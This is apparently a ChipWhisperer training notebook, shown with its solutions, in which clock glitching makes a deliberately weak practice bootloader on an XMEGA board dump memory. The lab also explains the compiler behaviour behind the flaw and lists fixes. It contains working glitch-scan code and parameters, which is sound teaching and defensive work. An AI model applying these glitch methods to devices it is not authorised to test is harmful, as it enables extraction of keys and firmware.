Part 1, Topic 3: Clock Glitching to Dump Memory (MAIN)

SUMMARY: In the previous lab, we learned how clock glitching can be used to get a microcontroller to skip a password check. This time, we’ll look at a more practical example: getting an example bootloader to dump a large chunk of memory.

LEARNING OUTCOMES:

  • Applying previous glitch settings to new firmware

  • Checking for success and failure when glitching

  • Understanding how compiler optimizations can cause devices to behave in strange ways

The Situation

Now that we’ve got our feet wet with glitching, we’re going to try something a bit more realistic: an “encrypted” bootloader (it’s actually just rot-13, but we’ll pretend it’s unbreakable encryption), where we make as few assumptions as possible. Our goal will be to get that bootloader to decrypt the data and send it back to us. Here’s what we know about the bootloader:

  1. The 'p' command is used to write encrypted firmware to the device. It takes in an encrypted ASCII-encoded string, terminated with a newline. Our first chunk of firmware is "516261276720736265747267206762206f686c207a76797821".

  2. The bootloader then processes the data (presumably decrypting it, authenticating it, and writing it to memory)

  3. It sends back an error code of "r000000\n"

Of immediate interest is that error code. That’s the only time the bootloader communicates back with us, so attacking there is a good place to start. One thing that we’ll assume is that we’ve got a trigger right before the error code is sent back to us. This is just a simple trigger_high() call, but we could also trigger on an IO line (better with the CW1200 Pro) or with a SAD trigger on a power trace (CW1200 Pro only). We’ve got a place to start, but let’s see if we can learn more about the bootloader first.
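As a quick sanity check on the “encryption”, the first firmware chunk can be decoded on the host. This is a minimal sketch that assumes the payload is hex-encoded ASCII passed through ROT13, as described above; the variable names are illustrative and are not part of the bootloader or the ChipWhisperer API.

```python
import codecs

# First chunk of "encrypted" firmware, as sent with the 'p' command.
chunk = "516261276720736265747267206762206f686c207a76797821"

# Hex -> ASCII text (still ROT13-scrambled at this point).
scrambled = bytes.fromhex(chunk).decode("ascii")

# ROT13 is its own inverse, so "decoding" and "encoding" are the same operation.
plaintext = codecs.decode(scrambled, "rot_13")

print(scrambled)
print(plaintext)
```

Knowing what the decrypted data should look like makes it easier to recognize it later if the device ever leaks it.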

In [1]:

SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'

In [2]:

%%bash -s "$PLATFORM"
cd ../../../hardware/victims/firmware/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE

Out [2]:

rm -f -- bootloader-CWLITEXMEGA.hex
rm -f -- bootloader-CWLITEXMEGA.eep
rm -f -- bootloader-CWLITEXMEGA.cof
rm -f -- bootloader-CWLITEXMEGA.elf
rm -f -- bootloader-CWLITEXMEGA.map
rm -f -- bootloader-CWLITEXMEGA.sym
rm -f -- bootloader-CWLITEXMEGA.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- bootloader.s decryption.s XMEGA_AES_driver.s uart.s usart_driver.s xmega_hal.s
rm -f -- bootloader.d decryption.d XMEGA_AES_driver.d uart.d usart_driver.d xmega_hal.d
rm -f -- bootloader.i decryption.i XMEGA_AES_driver.i uart.i usart_driver.i xmega_hal.i
.
Welcome to another exciting ChipWhisperer target build!!
avr-gcc.exe (WinAVR 20100110) 4.3.3

Copyright (C) 2008 Free Software Foundation, Inc.

This is free software; see the source for copying conditions.  There is NO

warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.



.
Compiling C: bootloader.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/bootloader.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/bootloader.o.d bootloader.c -o objdir/bootloader.o
.
Compiling C: decryption.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/decryption.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/decryption.o.d decryption.c -o objdir/decryption.o
.
Compiling C: .././hal/xmega/XMEGA_AES_driver.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/XMEGA_AES_driver.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/XMEGA_AES_driver.o.d .././hal/xmega/XMEGA_AES_driver.c -o objdir/XMEGA_AES_driver.o
.
Compiling C: .././hal/xmega/uart.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/uart.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/uart.o.d .././hal/xmega/uart.c -o objdir/uart.o
.
Compiling C: .././hal/xmega/usart_driver.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/usart_driver.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/usart_driver.o.d .././hal/xmega/usart_driver.c -o objdir/usart_driver.o
.
Compiling C: .././hal/xmega/xmega_hal.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/xmega_hal.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/xmega_hal.o.d .././hal/xmega/xmega_hal.c -o objdir/xmega_hal.o
.
Linking: bootloader-CWLITEXMEGA.elf
avr-gcc -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/bootloader.o -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/bootloader-CWLITEXMEGA.elf.d objdir/bootloader.o objdir/decryption.o objdir/XMEGA_AES_driver.o objdir/uart.o objdir/usart_driver.o objdir/xmega_hal.o --output bootloader-CWLITEXMEGA.elf -Wl,-Map=bootloader-CWLITEXMEGA.map,--cref   -lm
.
Creating load file for Flash: bootloader-CWLITEXMEGA.hex
avr-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature bootloader-CWLITEXMEGA.elf bootloader-CWLITEXMEGA.hex
.
Creating load file for EEPROM: bootloader-CWLITEXMEGA.eep
avr-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" --change-section-lma .eeprom=0 --no-change-warnings -O ihex bootloader-CWLITEXMEGA.elf bootloader-CWLITEXMEGA.eep || exit 0
.
Creating Extended Listing: bootloader-CWLITEXMEGA.lss
avr-objdump -h -S -z bootloader-CWLITEXMEGA.elf > bootloader-CWLITEXMEGA.lss
.
Creating Symbol Table: bootloader-CWLITEXMEGA.sym
avr-nm -n bootloader-CWLITEXMEGA.elf > bootloader-CWLITEXMEGA.sym
Size after:
   text        data     bss     dec     hex filename

   1540         124     120    1784     6f8 bootloader-CWLITEXMEGA.elf

+--------------------------------------------------------
+ Default target does full rebuild each time.
+ Specify buildtarget == allquick == to avoid full rebuild
+--------------------------------------------------------
+--------------------------------------------------------
+ Built for platform CW-Lite XMEGA with:
+ CRYPTO_TARGET = NONE
+ CRYPTO_OPTIONS = AES128C
+--------------------------------------------------------

In [3]:

%run "../../Setup_Scripts/Setup_Generic.ipynb"

Out [3]:

Serial baud rate = 38400
INFO: Found ChipWhisperer😍

In [4]:

fw_path = "../../../hardware/victims/firmware/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [5]:

cw.program_target(scope, prog, fw_path)

Out [5]:

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 1663 bytes

The first thing we’ll do is some simple power analysis to see what the device is doing when it sends data back to us. Serial communication is pretty slow, so set the ChipWhisperer to capture around 24k samples with a “x1” ADC clock.

In [6]:

scope.clock.adc_src = "clkgen_x1"
scope.adc.samples = 24000
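To see why a capture of roughly 24k samples is reasonable, the length of the serial reply can be estimated in clock cycles. The sketch below takes the clock frequency from the -DF_CPU flag in the build output and the baud rate from the setup script output; the 10 bits per character is an assumption (8N1 framing), and the constant names are purely illustrative.

```python
F_CPU = 7_372_800    # target clock in Hz (from -DF_CPU in the build output)
BAUD = 38_400        # serial baud rate reported by the setup script
BITS_PER_CHAR = 10   # assumption: 8N1 framing (start bit + 8 data bits + stop bit)

message = "r000000\n"

# Number of target clock cycles spent on each serial bit.
cycles_per_bit = F_CPU // BAUD

# Total clock cycles needed to shift the whole reply out of the UART.
cycles_for_message = len(message) * BITS_PER_CHAR * cycles_per_bit

print(cycles_per_bit)
print(cycles_for_message)
```

With the ADC running at one sample per clock cycle, this estimate fits inside the 24000-sample capture with some margin.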

Next, capture a power trace. The code below sends the string "p516261276720736265747267206762206f686c207a76797821\n", which hands the bootloader the first chunk of firmware, and then plots the resulting trace. If you don’t see the full serial message, you can increase scope.adc.decimate, which makes the ADC record only one out of every n samples.

In [7]:

scope.arm()
target.write("p516261276720736265747267206762206f686c207a76797821\n")
ret = scope.capture()
if ret:
    print("Timeout")
trace = scope.get_last_trace()

%matplotlib inline
import matplotlib.pyplot as plt
plt.figure()
plt.plot(trace)
plt.show()

Out [7]:

../_images/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png

It doesn’t look like anything too crazy is going on here - it’s probably just printing some characters in a loop. Some ideas:

  • If we glitch at the beginning of the loop, we might be able to corrupt the loop length variable and get it to print some extra memory

  • We might be able to corrupt the loop variable and get it to read past where it’s supposed to

Try selecting a few hundred cycles at the beginning and end of the loop.

HINT: The last part of the loop should be near the beginning of the last power spike.

HINT: If you’re really stuck on where the serial print ends, you can find the time between the trigger_high() and trigger_low() calls with scope.adc.trig_count.

In [8]:

print(scope.adc.trig_count)

Out [8]:

9645
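One way to turn the trigger count into a set of candidate glitch locations is to take a window that ends just past it. The helper below is hypothetical (it is not a ChipWhisperer function), and the default window sizes are only an illustrative choice.

```python
def window_near_end(trig_count, before=145, after=5):
    """Return candidate ext_offset values around the end of the trigger window."""
    start = max(0, trig_count - before)   # never go below cycle 0
    return list(range(start, trig_count + after))

# Trigger count printed above for this capture.
spots = window_near_end(9645)
print(spots[0], spots[-1], len(spots))
```

A narrow window keeps the scan short; it can always be widened if no successful glitch turns up.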

In [9]:

glitch_spots = [i for i in range(1)]
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################
glitch_spots.extend([i for i in range(16980, 17020, 1)])
if PLATFORM == "CWLITEXMEGA":
    glitch_spots.extend([i for i in range(9500, 9650, 1)])
# ###################
# END SOLUTION
# ###################

In [10]:

print(glitch_spots)

Out [10]:

[0, 16980, 16981, 16982, 16983, 16984, 16985, 16986, 16987, 16988, 16989, 16990, 16991, 16992, 16993, 16994, 16995, 16996, 16997, 16998, 16999, 17000, 17001, 17002, 17003, 17004, 17005, 17006, 17007, 17008, 17009, 17010, 17011, 17012, 17013, 17014, 17015, 17016, 17017, 17018, 17019, 9500, 9501, 9502, 9503, 9504, 9505, 9506, 9507, 9508, 9509, 9510, 9511, 9512, 9513, 9514, 9515, 9516, 9517, 9518, 9519, 9520, 9521, 9522, 9523, 9524, 9525, 9526, 9527, 9528, 9529, 9530, 9531, 9532, 9533, 9534, 9535, 9536, 9537, 9538, 9539, 9540, 9541, 9542, 9543, 9544, 9545, 9546, 9547, 9548, 9549, 9550, 9551, 9552, 9553, 9554, 9555, 9556, 9557, 9558, 9559, 9560, 9561, 9562, 9563, 9564, 9565, 9566, 9567, 9568, 9569, 9570, 9571, 9572, 9573, 9574, 9575, 9576, 9577, 9578, 9579, 9580, 9581, 9582, 9583, 9584, 9585, 9586, 9587, 9588, 9589, 9590, 9591, 9592, 9593, 9594, 9595, 9596, 9597, 9598, 9599, 9600, 9601, 9602, 9603, 9604, 9605, 9606, 9607, 9608, 9609, 9610, 9611, 9612, 9613, 9614, 9615, 9616, 9617, 9618, 9619, 9620, 9621, 9622, 9623, 9624, 9625, 9626, 9627, 9628, 9629, 9630, 9631, 9632, 9633, 9634, 9635, 9636, 9637, 9638, 9639, 9640, 9641, 9642, 9643, 9644, 9645, 9646, 9647, 9648, 9649]

Evaluating Success

Detecting whether our glitch was successful or not isn’t quite as trivial as in the previous lab - we don’t have a nice error return that the device calculates and sends back to us. One idea is that we can look for part of the string that we sent to the device: there isn’t much time between us sending it and the error code being returned. With any luck the compiler will have placed both values close in memory.
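A success check along these lines could be sketched as follows. The function name and the min_len parameter are hypothetical; the idea is simply to report a hit when any short slice of the string we sent shows up in the reply.

```python
SENT = "516261276720736265747267206762206f686c207a76797821"

def contains_sent_fragment(response, sent=SENT, min_len=3):
    """Return True if any min_len-character slice of `sent` occurs in `response`."""
    fragments = {sent[k:k + min_len] for k in range(len(sent) - min_len + 1)}
    return any(fragment in response for fragment in fragments)

# The normal reply shares no 3-character slice with the string we sent.
print(contains_sent_fragment("r000000\n"))
# A reply that leaks part of the input buffer does.
print(contains_sent_fragment("o0\n6720736265747267"))
```

Checking for a single fixed fragment (a plain substring test) is faster and is usually enough; the set of slices just makes the check less dependent on exactly which part of the buffer leaks.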

Now the rest is up to you! Use what you learned in the previous lab to set up glitch settings and a glitch loop. Here are a few hints to make things easier:

  1. Try to use a fairly small width and offset range since we’ll need to scan ext_offset as well here. A total range of ~2-3 for each with 0.4 steps is a good range to aim for.

  2. Try looking for a part of the string we sent to the device to check for success.

  3. You may want to forgo graphing or plot only successes/crashes if it makes things substantially slower - we’re scanning a large range of glitch settings so we’ll need all the speed we can get.
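To get a feel for why small ranges matter, the number of glitch attempts in a full scan can be counted up front. This is plain Python rather than the GlitchController API, the ranges are hypothetical, and the number of ext_offset values is taken from the glitch_spots list printed earlier.

```python
def sweep_values(start, stop, step):
    """Evenly spaced values from start to stop (inclusive), avoiding float drift."""
    count = int(round((stop - start) / step)) + 1
    return [round(start + k * step, 6) for k in range(count)]

# Hypothetical ranges: a total span of 2.4 for each parameter, in 0.4 steps.
widths = sweep_values(46.0, 48.4, 0.4)
offsets = sweep_values(-49.6, -47.2, 0.4)
num_glitch_spots = 191   # 1 + 40 + 150 ext_offset values

# Every (width, offset) pair is tried at every ext_offset.
attempts = len(widths) * len(offsets) * num_glitch_spots
print(len(widths), len(offsets), attempts)
```

Doubling the span of either parameter roughly doubles the number of attempts, so it pays to start narrow.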

Get your glitch all set up here:

In [11]:

import time

scope.adc.timeout = 0.1
if PLATFORM == "CWLITEXMEGA":
    def reboot_flush():
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    def reboot_flush():
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = True
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

scope.glitch.clk_src = 'clkgen'
scope.glitch.trigger_src = 'ext_single'
scope.glitch.repeat = 1
scope.glitch.output = "clock_xor"
scope.io.hs2 = "glitch"

def my_print(text):
    """Print text, showing non-printable characters as hex (e.g. 0x00)."""
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n":
            print(ch, end='')
        else:
            print("0x{:02X}".format(ord(ch)), end='')

In [12]:

import matplotlib.pylab as plt
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset"])
gc.display_stats()


fig = plt.figure()
plt.plot(-48, 48, ' ')
plt.plot(48, -48, ' ')
plt.plot(-48, -48, ' ')
plt.plot(48, 48, ' ')

Out [12]:

[<matplotlib.lines.Line2D at 0x276c843ff48>]
../_images/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png

Finally, create a glitch loop. Don’t forget to check all the different glitch_spots as well!

In [13]:

from importlib import reload
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import tqdm
import re
import struct
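# Glitch ranges. Note that the first width/offset pair is immediately
# overridden by the second pair, which is the one the scan actually uses.
gc.set_range("width", 3, 14)
gc.set_range("offset", -14.5, -13)

gc.set_range("width", 46, 49.8)
gc.set_range("offset", -46, -49.8)
step = 2
gc.set_global_step(step)
scope.glitch.repeat = 4  # number of glitch pulses generated per trigger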

broken = False
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    if broken:
        break
    for i in tqdm(glitch_spots, leave=False):
        scope.glitch.ext_offset = i
        if broken:
            break
        if scope.adc.state:
            #print("Timeout, trigger still high!")
            gc.add("reset", (scope.glitch.width, scope.glitch.offset))
            plt.plot(scope.glitch.width, scope.glitch.ext_offset, 'xr', alpha=1)
            fig.canvas.draw()

            #Device is slow to boot?
            reboot_flush()
        target.flush()
        scope.arm()
        target.write("p516261276720736265747267206762206f686c207a76797821\n")
        ret = scope.capture()
        if ret:
            #print('Timeout - no trigger')
            gc.add("reset", (scope.glitch.width, scope.glitch.offset))
            plt.plot(scope.glitch.width, scope.glitch.ext_offset, 'xr', alpha=1)
            fig.canvas.draw()

            #Device is slow to boot?
            reboot_flush()
        else:
            time.sleep(0.05)
            output = target.read(timeout=2)
            if "767" in output:
                print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(i, scope.glitch.offset, scope.glitch.width))
                plt.plot(scope.glitch.width, scope.glitch.ext_offset, '+g')
                gc.add("success", (scope.glitch.width, scope.glitch.offset))
                fig.canvas.draw()
                broken = True
                for __ in range(500):
                    num_char = target.in_waiting()
                    if num_char:
                        my_print(output)
                        output = target.read(timeout=50)
                time.sleep(1)
                break
            else:
                gc.add("normal", (scope.glitch.width, scope.glitch.offset))

Out [13]:

WARNING:root:Negative offsets <-45 may result in double glitches!
WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred.
Glitched!
    Ext offset: 9629
    Offset: -49.609375
    Width: 46.09375
o0





6720736265747267206762206f686c207a767978210x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00Don't forget to buy milk!
WARNING:root:Negative offsets <-45 may result in double glitches!
../_images/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_5.png

Diagnosing the Fault

As you can see by the output, the bootloader has suffered a pretty catastrophic failure! Not only has it spilled the secret, it’s also dumped a whole bunch more memory. For a real bootloader, there’s probably some pretty juicy stuff in there like encryption keys or previously decrypted firmware. Let’s start by taking a look at the C source code that sends the error code back:

trigger_high();

int i;
for(i = 0; i < ascii_idx; i++)
{
    putch(ascii_buffer[i]);
}
trigger_low();
state = IDLE;

Nothing really looks too unusual here. Before we take a look at the assembly and figure out what went wrong, let’s try to make some guesses:

  • Maybe the glitch corrupted the ascii_idx variable

    • The glitch happened near the end of the loop. It’s unlikely the end of loop counter would be reloaded during the loop

  • Maybe we skipped the last i < ascii_idx check

    • The glitch caused a lot of memory to be dumped. If we just skipped the last check it should only print an extra character

  • i is a signed integer: maybe we corrupted it into being a really large negative number.

That last one seems to be our best theory, so let’s go with that.

The Answer

Let’s check the assembly for our bootloader. There’s no need to disassemble the binary or recompile to assembly, since the build process also creates a listing file (*.lss). This file interleaves the C source with the assembly, which makes it easy to search (try searching for the trigger_high() call). You might notice that instead of the less-than comparison from our C code, the compiler has inserted a not-equal comparison! This means our original guess may not have been correct: our assumption that skipping the last i < ascii_idx check would print only one extra character doesn’t hold. With a not-equal comparison, once i gets past ascii_idx the loop keeps going until i wraps all the way around. It’s therefore a lot more likely that the last check was skipped (or that i was set to some larger value) than that one particular bit was flipped to make i negative.

This is actually a pretty unexpected change for the compiler to make, especially since less than, greater than, and not equal are nearly identical instructions in terms of implementation and have the same instruction size and speed. This showcases an important fact: the C code that you write is not directly translated to assembly. It needs to go through the compiler first, which may drastically change the intended logic of the program.
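The difference between the two comparisons can be illustrated with a small simulation. This is a simplified model and not the actual generated assembly: it assumes the exit test runs at the bottom of the loop after each increment, that i is a 16-bit counter (int is 16 bits with avr-gcc), and that the glitch skips exactly one exit test. All names are hypothetical.

```python
def count_putch_calls(length, keep_going, skip_check_at=None, limit=100_000):
    """Count putch() calls for a loop whose exit test follows each increment.

    keep_going(i, length) is the loop condition; skip_check_at is the value
    of i at which a single exit test is skipped (the simulated glitch).
    """
    i = 0
    calls = 0
    glitched = False
    while calls < limit:
        calls += 1                  # putch(ascii_buffer[i])
        i = (i + 1) & 0xFFFF        # i++ on a 16-bit counter
        if not glitched and i == skip_check_at:
            glitched = True         # glitch: this one comparison never runs
            continue
        if not keep_going(i, length):
            break
    return calls

def less_than(i, n):
    return i < n

def not_equal(i, n):
    return i != n

print(count_putch_calls(8, less_than))                    # no glitch
print(count_putch_calls(8, not_equal))                    # no glitch
print(count_putch_calls(8, less_than, skip_check_at=8))   # last check skipped
print(count_putch_calls(8, not_equal, skip_check_at=8))   # last check skipped
```

Without a glitch both versions behave identically. When the final check is skipped, the less-than version prints a single extra character, while the not-equal version keeps printing until the counter wraps around and reaches the length again.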

Now that we know what happened, let’s look at some ways to fix it.

1. Volatile variables

C includes a keyword for variables called volatile, which indicates that the variable may change between accesses and therefore should not have optimizations applied to it. A typical use case for volatile is for peripheral registers on embedded devices. It would be really bad, for example, if you were trying to wait for an IO pin to go high in your code, but the compiler decided it would be faster to check it only once and assume it doesn’t change!

Try replacing int i; before the print loop with volatile int i;, recompile, and check the listing file. Are there any other unexpected changes? What about if you consider the use case above (i.e. if i was a register instead of a loop variable)? Is there any way the attack might still work? If so, how might you mitigate this?

2. Unrolling the loop

Another potential way of solving this issue would be to manually unroll the loop. The message being printed by the bootloader is a constant length of 7 characters, so we could instead write:

int i = 0;
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);

In fact, this is something the compiler might do on its own to optimize the code, since unrolling a loop like this is faster than the loop version. It’s not a good idea to blindly rely on this, however, since the compiler could choose not to make this optimization as well and might change it between builds.

3. Checking for invalid characters

Another thing to consider is that the message from the bootloader only has a limited range of characters that it prints. We could instead construct a “safe print” function that only prints newlines, 'r' and ASCII digits (i.e. '0' to '9'):

int safe_print(char c)
{
    if ((c == '\n') ||
       ((c >= '0') && (c <= '9')) ||
       (c == 'r')) {
        putch(c);
        return 0;
    }
    return -1; //uh oh!
}

If we went this route, it would be a good idea to make the error return a separate buffer with a bunch of null characters at the end.
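The reason for the separate, null-padded buffer can be seen with a small host-side model of the character filter. This sketch assumes the caller stops printing as soon as safe_print() rejects a character; the memory layouts are hypothetical and only meant to illustrate the idea.

```python
ALLOWED = set("r0123456789\n")

def safe_dump(memory):
    """Print characters until one falls outside the allowed set."""
    printed = []
    for c in memory:
        if c not in ALLOWED:
            break               # safe_print() returned -1: stop printing
        printed.append(c)
    return "".join(printed)

sent = "516261276720736265747267206762206f686c207a76797821"

# Error code directly followed by other data that happens to be mostly digits.
adjacent = "r000000\n" + sent
# Error code in its own buffer, padded with null characters.
padded = "r000000\n" + "\x00" * 8 + sent

print(repr(safe_dump(adjacent)))
print(repr(safe_dump(padded)))
```

In the first layout the filter still lets through every digit up to the first 'f', since digits are valid output. In the second layout the overrun hits a null character immediately and nothing past the error code is printed.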

4. More generic methods

More generic ways of defending against glitch attacks (memory guards, for example) are also discussed in the training slides.

In [14]:

scope.dis()
target.dis()

In [15]:

assert broken is True